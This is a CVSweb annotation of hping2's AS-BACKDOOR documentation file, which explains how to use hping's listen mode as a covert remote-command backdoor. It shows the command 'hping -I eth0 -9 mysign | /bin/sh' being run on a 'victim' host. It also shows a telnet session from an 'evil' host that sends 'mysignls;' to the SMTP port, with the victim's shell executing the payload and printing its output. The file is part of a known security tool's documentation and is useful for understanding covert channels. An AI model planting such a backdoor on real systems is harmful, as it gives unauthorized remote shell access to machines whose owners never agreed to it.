Annotation of embedaddon/hping2/docs/AS-BACKDOOR, revision 1.1
1.1 ! misho 1: hping can be used as a backdoor. Just try the -9 (--listen) option
! 2: and put in pipe with /bin/sh:
! 3:
! 4: Put hping in listen mode in the victim host.
! 5:
! 6: victim# hping -I eth0 -9 mysign | /bin/sh
! 7:
! 8: Every packet that contain "mysign" will be processed by hping,
! 9: all the bytes that follows "mysign" in the packet will be dumped
! 10: to the standard output, so for example I'll able to exec commands
! 11: using all types of protocols. Just for example I can use the smtpd
! 12: to exec 'ls' in the victim.
! 13:
! 14: evil$ telnet victim 25
! 15:
! 16: Trying 192.168.1.1...
! 17: Connected to nano (192.168.1.1).
! 18: Escape character is '^]'.
! 19: 220 nano.marmoc.net ESMTP Sendmail
! 20: mysignls;
! 21:
! 22: on the victim you will see:
! 23:
! 24: victim# hping -I eth0 -9 mysign | /bin/sh
! 25: hping2 listen mode
! 26: bin cdrom etc home local-home mnt root tmp var
! 27: boot dev export lib lost+found proc sbin usr
! 28: : command not found
! 29:
! 30: As you can see I used 'ls;' since otherwise the shell will receive
! 31: just ls^M. The ";" force the command execution (at least with bash and zsh,
! 32: check your shell for more information).
! 33:
! 34: This works with all kind of valid not-filtered IP packets, the higher
! 35: level protocl does not matter.
! 36:
! 37: antirez <antirez@invece.org>
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>